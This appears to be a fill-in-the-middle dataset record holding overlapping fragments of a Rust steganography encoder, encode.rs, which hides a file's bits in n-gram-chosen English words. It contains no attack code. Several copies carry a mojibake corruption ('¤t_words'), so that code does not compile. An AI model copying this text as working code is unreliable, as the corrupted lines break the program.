                utils::fill_bit_to_char_map(rng, bit_to_char_map);
                char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
            }
            i += 1;
        }
    }
    text_data.pop(); // remove trailing space
    let num_bytes = (file_words.len() * num_bits) / 8;
    // print summary
    println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
    println!("succesfully filled {} words", (succ_count + skip_count));
    println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
    println!("failed to find a word {} times", fail_count);
    println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
    println!("\nN-depth summary: {:?}", n_gram_used);
    Ok(text_data)
}
pub fn get_value_vec_from_char_value_mode(
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut value_vec = vec![];
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
value_vec.push(value);
num_bits_remain -= num_bits_to_read as usize;
}
value_vec
}
pub fn get_value_vec(
bit_to_char_map: &mut HashMap<usize, char>,
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
) -> Vec<String> |
/// Hides each value of `file_values` by emitting a dictionary word whose
/// character value (per `char_to_value_map`, interpreted by `value_mode`)
/// equals that value; ties between candidates are broken with the n-gram
/// model. Returns the stego text and prints a summary to stdout.
///
/// Punctuation tokens are never emitted: the decoder does not ignore them,
/// and keeping them would force unnatural spacing ("cars , toys , ...").
///
/// # Panics
/// Panics if no dictionary word maps to a required value.
pub fn wordify_from_char_value_mode(
    gram: &HashMap<Vec<&str>, usize>,
    char_to_value_map: &mut HashMap<char, usize>,
    n: usize,
    file_values: Vec<u8>,
    num_bits: usize,
    unique_words: &Vec<&str>,
    total_words: f64,
    use_shuffle: bool,
    value_mode: utils::ValueMode,
    rng: &mut StdRng,
) -> Result<String, String> {
    let mut succ_count = 0;
    let mut n_gram_used = vec![0; n];
    let mut text_data = String::from("");
    let mut current_words = get_initial_words(gram, n);
    let mut i = 0;
    while i < file_values.len() {
        let current_val = file_values[i];
        // Collect every non-punctuation word whose value matches current_val.
        let mut usable_words = vec![];
        for w in unique_words {
            if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
                continue;
            }
            let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
            if w_val == current_val as usize {
                usable_words.push(*w);
            }
        }
        match usable_words.len() {
            0 => {
                panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
            },
            1 => {
                // Single candidate: take it without ranking (depth 0).
                succ_count += 1;
                let best_word = &usable_words[0];
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
                n_gram_used[0] += 1;
            },
            _ => {
                // Several candidates: pick the most probable continuation.
                // (Previous version had mojibake `¤t_words` here;
                // restored to `&current_words`.)
                let (best_word, n_used) = get_best_word(
                    gram,
                    &usable_words,
                    &current_words,
                    n,
                    total_words,
                );
                succ_count += 1;
                n_gram_used[n_used] += 1;
                text_data.push_str(best_word);
                current_words.push(best_word);
                text_data.push_str(" ");
            }
        };
        if use_shuffle {
            // Keep the map in lock-step with the decoder's seeded rng.
            utils::shuffle_char_value_map(rng, char_to_value_map);
        }
        i += 1;
    }
    text_data.pop(); // remove trailing space
    let num_bytes = (file_values.len() * num_bits) / 8;
    // print summary
    println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
    println!("succesfully filled {} words", succ_count);
    println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
    println!("\nN-depth summary: {:?}", n_gram_used);
    Ok(text_data)
}
pub fn encode_char_bit_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
let mut original_bit_to_char_map = bit_to_char_map.clone();
utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify(
&gram_hash,
n_depth,
value_vec,
&mut original_rng,
&mut original_bit_to_char_map,
&unique_words,
total_words as f64,
consecutive_skips,
depth_skip_threshold,
use_shuffle,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode_char_value_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
value_mode: utils::ValueMode,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
let mut original_char_to_value_map = char_to_value_map.clone();
utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
// panic!("dsa");
let mut value_vec = get_value_vec_from_char_value_mode(
&contents,
num_bits,
use_shuffle,
&mut rng,
&mut char_to_value_map,
);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify_from_char_value_mode(
&gram_hash,
&mut original_char_to_value_map,
n_depth,
value_vec,
num_bits,
&unique_words,
total_words as f64,
use_shuffle,
value_mode,
&mut original_rng,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode(matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut sorted_keys = vec![];
let mut value_vec = vec![];
for byte_val in bit_to_char_map.keys() {
sorted_keys.push(*byte_val);
}
sorted_keys.sort_by(|a, b| b.cmp(a));
// sort keys once so you dont need to do it in the iteration.
// the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
// to characters. we iterate over the bit position values, and push the value
// to a sorted_keys vec, and then sort in descending order
// (ie: 0th element is largest)
// we do this because the user provides the number of bits.
// so if the user says number
// of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
if use_shuffle {
utils::fill_bit_to_char_map(rng, bit_to_char_map);
}
value_vec.push(char_str);
num_bits_remain -= num_bits_to_read as usize;
}
// iterate the file that you wish to encode, reading num_bits at a time.
// for each value you read, generate characters that map to the value using the bit to char map
// if using shuffle, the bit to char map gets shuffled according to a seeded rng.
// at the end you have a vector of gibberish strings that you will try to hide
// in words using ngrams.
value_vec
} | identifier_body |
encode.rs | use std::fs;
use std::io::{Cursor};
use std::collections::HashMap;
use clap::ArgMatches;
use rand::{Rng, prelude::StdRng};
use bitstream_io::{BigEndian, BitReader};
use ngrams::Ngram;
use rpassword;
use super::utils;
pub fn generate_ngrams<'a>(text: &'a String, n: usize) -> (HashMap<Vec<&str>, usize>, Vec<&str>, usize) {
let mut n_down = n;
let mut hash: HashMap<Vec<&str>, usize> = HashMap::new();
let mut unique_words: Vec<&str> = vec![];
let mut total_words = 0;
while n_down > 0 {
// we wish to generate a hash map that contains n-grams for each value of n
// from the user provided n, down to n == 1. this allows us to do a 'stupid backoff'
// if there is not enough data at a certain n-depth for a certain word, we can
// keep backing off to n - 1 until we find enough data to make a decision on which
// word to use. (or until we hit n == 1, in which case we pick a random word).
let mut grams: Vec<Vec<&str>> = vec![];
match n_down {
1 => {
for t in text.split_whitespace() {
grams.push(vec![t]);
}
// for some reason the ngrams crate has difficulty when n == 1,
// so in this case we generate the n gram ourselves by a simple whitespace
// delimiter.
},
_ => {
grams = text.split_whitespace().ngrams(n_down).collect();
}
}
for v in grams {
if n_down == 1 {
total_words += 1;
}
if let Some(val) = hash.get_mut(&v) {
*val += 1;
} else {
if n_down == 1 {
unique_words.push(v[0]);
// if we are on the last n-depth (n == 1),
// that means the vectors only contain one word.
// if the hash does not have this vector of one word yet, then
// this is the first time we are seeing it, so we will add it to
// a vector of unique words.
}
hash.insert(v, 1);
// if the hash does not have this vector yet, add it
// with occurance 1, and next time we see this vector,
// increment the occurance
}
}
n_down -= 1;
}
(hash, unique_words, total_words)
}
pub fn get_restricted_chars(char_map: &HashMap<char, usize>, gib_word: &String) -> Vec<char> {
let mut restricted_chars = vec![];
for key in char_map.keys() {
restricted_chars.push(*key);
}
let word_chars: Vec<char> = gib_word.chars().collect();
for c in word_chars {
if restricted_chars.contains(&c) {
let char_index = restricted_chars.iter().position(|&r| r == c).unwrap();
restricted_chars.remove(char_index);
}
}
restricted_chars
}
pub fn can_use_word(word: &str, good_chars: &Vec<char>, restricted_chars: &Vec<char>) -> bool {
let word_chars: Vec<char> = word.chars().collect();
let mut good_chars_used = vec![0; good_chars.len()];
for c in word_chars {
if restricted_chars.contains(&c) {
return false;
}
if good_chars.contains(&c) {
let char_index = good_chars.iter().position(|&r| r == c).unwrap();
good_chars_used[char_index] += 1;
}
}
for i in good_chars_used {
if i == 0 {
return false;
}
}
true
}
pub fn get_initial_words<'a>(hashmap: &'a HashMap<Vec<&str>, usize>, n: usize) -> Vec<&'a str> {
let mut vecs_with_n_items = vec![];
for key in hashmap.keys() {
if key.len() == n {
vecs_with_n_items.push(key);
}
}
let mut count_hash = HashMap::new();
for vec in vecs_with_n_items {
let mut n_minus_1_slice = vec![];
let mut counter = 1;
for word in vec {
if counter < n {
n_minus_1_slice.push(*word);
} else {
break;
}
counter += 1;
}
if let Some(val) = count_hash.get_mut(&n_minus_1_slice) {
*val += 1;
} else {
count_hash.insert(n_minus_1_slice, 1);
}
}
let mut best_vec_count = 0;
let mut best_vec = vec![];
for vec in count_hash.keys() {
let vec_count = count_hash.get(vec).unwrap();
if vec_count > &best_vec_count {
best_vec_count = *vec_count;
best_vec = vec.to_vec();
}
}
best_vec
}
pub fn get_probability_of(word: &str, given: &Vec<&str>, hashmap: &HashMap<Vec<&str>, usize>, num_words: f64) -> f64 {
let count_of_given = match given.len() {
0 => num_words,
_ => {
if let Some(count) = hashmap.get(given) {
*count as f64
} else {
return 0.0;
}
},
};
let mut word_vec = given.clone();
word_vec.push(word);
let count_of_sequence = if let Some(count) = hashmap.get(&word_vec) {
*count as f64
} else {
return 0.0;
};
count_of_sequence / count_of_given
}
pub fn get_best_word<'a>(
gram: &HashMap<Vec<&str>, usize>,
usable_words: &Vec<&'a str>,
current_words: &Vec<&str>,
n: usize,
total_words: f64,
) -> (&'a str, usize) {
let mut all_p_zero = true;
let mut use_n = n;
let mut max_p_index = 0;
while all_p_zero {
let mut ngram_slice = vec![];
let mut counter = 1;
for word in current_words.iter().rev() {
if counter < use_n {
ngram_slice.push(*word);
}
counter += 1;
}
ngram_slice.reverse();
let last_word = ngram_slice.last().unwrap();
let mut max_p = 0.0;
max_p_index = 0;
for i in 0..usable_words.len() {
let w = &usable_words[i];
if w == last_word {
continue;
}
let p = get_probability_of(w, &ngram_slice, gram, total_words);
// let p = get_interpolated_probability(w, &ngram_slice, gram, total_words);
// println!("P({} | {:?}) = {}", w, ngram_slice, p);
if p > max_p {
all_p_zero = false;
max_p_index = i;
max_p = p;
}
}
if all_p_zero {
use_n -= 1;
}
// comment this if using interpolation
if use_n == 1 {
// no point in picking the word that appears the most...
// take our chances and break, and pick a random word from the list.
// println!("reached bottom of use n!");
break;
}
}
use_n -= 1;
if use_n == 0 {
let mut rng = rand::thread_rng();
max_p_index = rng.gen_range(0, usable_words.len());
}
(usable_words[max_p_index], use_n)
}
pub fn wordify(
gram: &HashMap<Vec<&str>, usize>,
n: usize,
file_words: Vec<String>,
rng: &mut StdRng,
bit_to_char_map: &mut HashMap<usize, char>,
unique_words: &Vec<&str>,
total_words: f64,
consecutive_skips: usize,
depth_skip_threshold: usize,
use_shuffle: bool,
) -> Result<String, String> {
let mut char_to_bit_map = HashMap::new();
let mut num_bits = 0;
for bit_val in bit_to_char_map.keys() {
num_bits += 1;
char_to_bit_map.insert(*bit_to_char_map.get(&bit_val).unwrap(), *bit_val);
}
num_bits -= 1;
// let num_words = unique_words.len();
let mut succ_count = 0;
let mut fail_count = 0;
let mut skip_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
let mut consecutive_skips_used = 0;
let mut skip_words = vec![];
if !use_shuffle {
for w in unique_words {
if utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
}
// if not shuffling, skip words get filled in once before
// iterating.
}
while i < file_words.len() {
let gibberish_word = &file_words[i];
let mut used_skip_word = false;
let mut use_keys = vec![];
for key in char_to_bit_map.keys() {
use_keys.push(*key);
}
let restricted_chars = get_restricted_chars(&char_to_bit_map, gibberish_word);
let mut usable_words = vec![];
if use_shuffle {
skip_words = vec![];
// if shuffling the bit to char map,
// we have to reset the skip words every time because they might
// be different
}
// let mut value_num_list = vec![0; max_value];
for w in unique_words {
// let word_val = get_value_from_word(w, char_value_map, max_value);
// // println!("value for {}: {}", w, get_value_from_word(w, char_value_map, 2));
// value_num_list[word_val] += 1;
if use_shuffle && utils::is_skip_word(w, &char_to_bit_map) {
skip_words.push(*w);
}
if can_use_word(w, &gibberish_word.chars().collect(), &restricted_chars) {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
fail_count += 1;
text_data.push_str(&gibberish_word);
text_data.push_str(" ");
current_words.push(".");
consecutive_skips_used = 0;
// if there are NO usable words at all then we 'failed'
// to encode this word. we push the gibberish word as is to
// the text data output because we still need to be able to decode it.
// we add a . to current words to stimulate the ngram probability
// for the next word.
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
consecutive_skips_used = 0;
// there is only one usable word, so use it without
// estimating any probabilities. ngram used a depth
// of 0 since we are not evaluating ngrams here.
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
// user can fine-tune the quality of the text output using depth_skip_threshold
// and consecutive skips allowed. The higher both are, the more skip words are used
// which can potentially make the output look more like real text, at the
// expense of encoding less bits per word on average.
// consecutive skips used sets a limit to this such that it forces
// the program to eventually encode a word, otherwise it might
// loop forever in certain situations.
// depth skip threshold allows user to say which n-depths are acceptable.
// lower n-depths produce less realistic.
if n_used <= depth_skip_threshold && consecutive_skips_used < consecutive_skips && skip_words.len() > 0 {
let (best_word2, n_used2) = get_best_word(
gram,
&skip_words,
¤t_words,
n,
total_words
);
n_gram_used[n_used2] += 1;
current_words.push(best_word2);
text_data.push_str(best_word2);
text_data.push_str(" ");
skip_count += 1;
used_skip_word = true;
consecutive_skips_used += 1;
i -= 1;
// we used a skip word, make sure to keep i at its current
// level so that we try to encode this word again
} else {
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
consecutive_skips_used = 0;
// if not using a skip word, we encoded the best possible word according
// to ngrams. add the best word to the text output, as well as the current
// words vec which is used to determine word probabilities for the next
// iteration
}
}
};
if !used_skip_word && use_shuffle {
// only shuffle the bit to char map if we encoded a word
// if we used a skip word, we do NOT want to shuffle as we
// will not be able to properly decode
utils::fill_bit_to_char_map(rng, bit_to_char_map);
char_to_bit_map = utils::make_char_to_bit_map(bit_to_char_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_words.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_words.len());
println!("succesfully filled {} words", (succ_count + skip_count));
println!("of the {} words, {} were skip words", (succ_count + skip_count), skip_count);
println!("failed to find a word {} times", fail_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / (succ_count + skip_count) as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn get_value_vec_from_char_value_mode(
file_contents: &Vec<u8>,
num_bits: usize, | let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut value_vec = vec![];
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
value_vec.push(value);
num_bits_remain -= num_bits_to_read as usize;
}
value_vec
}
pub fn get_value_vec(
bit_to_char_map: &mut HashMap<usize, char>,
file_contents: &Vec<u8>,
num_bits: usize,
use_shuffle: bool,
rng: &mut StdRng,
) -> Vec<String> {
let mut cursor = Cursor::new(&file_contents);
let mut num_bits_remain = file_contents.len() * 8;
let mut bitreader = BitReader::endian(&mut cursor, BigEndian);
let mut sorted_keys = vec![];
let mut value_vec = vec![];
for byte_val in bit_to_char_map.keys() {
sorted_keys.push(*byte_val);
}
sorted_keys.sort_by(|a, b| b.cmp(a));
// sort keys once so you dont need to do it in the iteration.
// the bit to char map maps bit positions: (0, 1, 2, 4, 8, 16, 32, etc)
// to characters. we iterate over the bit position values, and push the value
// to a sorted_keys vec, and then sort in descending order
// (ie: 0th element is largest)
// we do this because the user provides the number of bits.
// so if the user says number
// of bits is 3, then the sorted keys will look like: [4, 2, 1, 0]
while num_bits_remain > 0 {
let num_bits_to_read = if num_bits_remain < num_bits as usize {
num_bits_remain as u32
} else {
num_bits as u32
};
let value: u8 = bitreader.read(num_bits_to_read).unwrap();
let char_str = utils::get_chars_from_value(value, bit_to_char_map, &sorted_keys);
if use_shuffle {
utils::fill_bit_to_char_map(rng, bit_to_char_map);
}
value_vec.push(char_str);
num_bits_remain -= num_bits_to_read as usize;
}
// iterate the file that you wish to encode, reading num_bits at a time.
// for each value you read, generate characters that map to the value using the bit to char map
// if using shuffle, the bit to char map gets shuffled according to a seeded rng.
// at the end you have a vector of gibberish strings that you will try to hide
// in words using ngrams.
value_vec
}
pub fn wordify_from_char_value_mode(
gram: &HashMap<Vec<&str>, usize>,
char_to_value_map: &mut HashMap<char, usize>,
n: usize,
file_values: Vec<u8>,
num_bits: usize,
unique_words: &Vec<&str>,
total_words: f64,
use_shuffle: bool,
value_mode: utils::ValueMode,
rng: &mut StdRng,
) -> Result<String, String> {
let mut succ_count = 0;
let mut n_gram_used = vec![0; n];
let mut text_data = String::from("");
let mut current_words = get_initial_words(gram, n);
let mut i = 0;
while i < file_values.len() {
let current_val = file_values[i];
let mut usable_words = vec![];
for w in unique_words {
if *w == "." || *w == "," || *w == "?" || *w == ";" || *w == "!" {
// dont use punctuation in char_value mode because
// punctuation isnt ignored by the decoder. if you want
// to leave punctuation in, you would also have to leave
// the spaces around them which would result in a stego text
// like: he likes cars , toys , and trucks .
// for that reason, I chose to ignore punctuation
continue;
}
let w_val = utils::get_value_from_chars(w, &char_to_value_map, &value_mode);
if w_val == current_val as usize {
usable_words.push(*w);
}
}
match usable_words.len() {
0 => {
panic!("NOT ENOUGH WORDS WITH VALUE {}", current_val);
},
1 => {
succ_count += 1;
let best_word = &usable_words[0];
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
n_gram_used[0] += 1;
},
_ => {
let (best_word, n_used) = get_best_word(
gram,
&usable_words,
¤t_words,
n,
total_words,
);
succ_count += 1;
n_gram_used[n_used] += 1;
text_data.push_str(best_word);
current_words.push(best_word);
text_data.push_str(" ");
}
};
if use_shuffle {
utils::shuffle_char_value_map(rng, char_to_value_map);
}
i += 1;
}
text_data.pop(); // remove trailing space
let num_bytes = (file_values.len() * num_bits) / 8;
// print summary
println!("\nencoding using {} bits per word. file had {} bytes, ie: {} words to wordify", num_bits, num_bytes, file_values.len());
println!("succesfully filled {} words", succ_count);
println!("average bits per word: {}\n", ((num_bytes * 8) as f64 / succ_count as f64));
println!("\nN-depth summary: {:?}", n_gram_used);
Ok(text_data)
}
pub fn encode_char_bit_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut bit_to_char_map = utils::make_bit_to_char_map(num_bits);
let mut original_bit_to_char_map = bit_to_char_map.clone();
utils::fill_bit_to_char_map(&mut rng, &mut bit_to_char_map);
utils::fill_bit_to_char_map(&mut original_rng, &mut original_bit_to_char_map);
let value_vec = get_value_vec(&mut bit_to_char_map, &contents, num_bits, use_shuffle, &mut rng);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify(
&gram_hash,
n_depth,
value_vec,
&mut original_rng,
&mut original_bit_to_char_map,
&unique_words,
total_words as f64,
consecutive_skips,
depth_skip_threshold,
use_shuffle,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode_char_value_map(
file: &str,
output: &str,
seed_str: &str,
word_file_name: &str,
n_depth: usize,
consecutive_skips: usize,
depth_skip_threshold: usize,
num_bits: usize,
use_shuffle: bool,
value_mode: utils::ValueMode,
) -> Result<(), String> {
let mut rng = utils::create_rng_from_seed(seed_str);
let mut original_rng = utils::create_rng_from_seed(seed_str);
let contents = utils::get_file_contents(file)?;
let mut word_file_data = utils::get_file_contents_as_string(word_file_name)?;
let mut char_to_value_map = utils::make_char_to_value_map(num_bits);
let mut original_char_to_value_map = char_to_value_map.clone();
utils::shuffle_char_value_map(&mut rng, &mut char_to_value_map);
utils::shuffle_char_value_map(&mut original_rng, &mut original_char_to_value_map);
// panic!("dsa");
let mut value_vec = get_value_vec_from_char_value_mode(
&contents,
num_bits,
use_shuffle,
&mut rng,
&mut char_to_value_map,
);
word_file_data = word_file_data.to_lowercase();
word_file_data = utils::format_text_for_ngrams(&word_file_data);
let (
gram_hash,
unique_words,
total_words,
) = generate_ngrams(&word_file_data, n_depth);
let text_data = wordify_from_char_value_mode(
&gram_hash,
&mut original_char_to_value_map,
n_depth,
value_vec,
num_bits,
&unique_words,
total_words as f64,
use_shuffle,
value_mode,
&mut original_rng,
)?;
fs::write(output, text_data).unwrap();
Ok(())
}
pub fn encode(matches: &ArgMatches) -> Result<(), String> {
let file = utils::get_value(matches, "file")?;
let output = utils::get_value(matches, "output")?;
let mut seed_str = utils::get_value(matches, "seed")?;
let password_str = utils::get_value(matches, "password")?;
let alg_str = utils::get_value(matches, "algorithm")?;
let word_file_name = utils::get_value(matches, "words")?;
let n_depth = utils::get_numerical_value(matches, "n")?;
let consecutive_skips = utils::get_numerical_value(matches, "consecutive_skips")?;
let depth_skip_threshold = utils::get_numerical_value(matches, "depth_skip")?;
let num_bits = utils::get_numerical_value(matches, "bits")?;
if num_bits > 8 || num_bits < 1 {
return Err(format!("Bits must be between 1 and 8 inclusively, you provided {}", num_bits));
}
let pass;
match password_str {
"true" => {
// get seed string interactively
pass = rpassword::prompt_password_stderr("Enter password: ").unwrap();
seed_str = pass.as_str();
},
_ => (),
};
let alg = utils::get_algorithm_from_string(alg_str, num_bits)?;
let (use_shuffle, value_mode) = match alg {
utils::Algorithm::Shuffle(mode) => {
(true, mode)
},
utils::Algorithm::NoShuffle(mode) => {
(false, mode)
},
};
match value_mode {
utils::ValueMode::CharBitMap => {
encode_char_bit_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
)
},
utils::ValueMode::CharValueMap(val) => {
encode_char_value_map(
file,
output,
seed_str,
word_file_name,
n_depth,
consecutive_skips,
depth_skip_threshold,
num_bits,
use_shuffle,
value_mode,
)
},
}
} | use_shuffle: bool,
rng: &mut StdRng,
char_to_value_map: &mut HashMap<char, usize>,
) -> Vec<u8> { | random_line_split |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.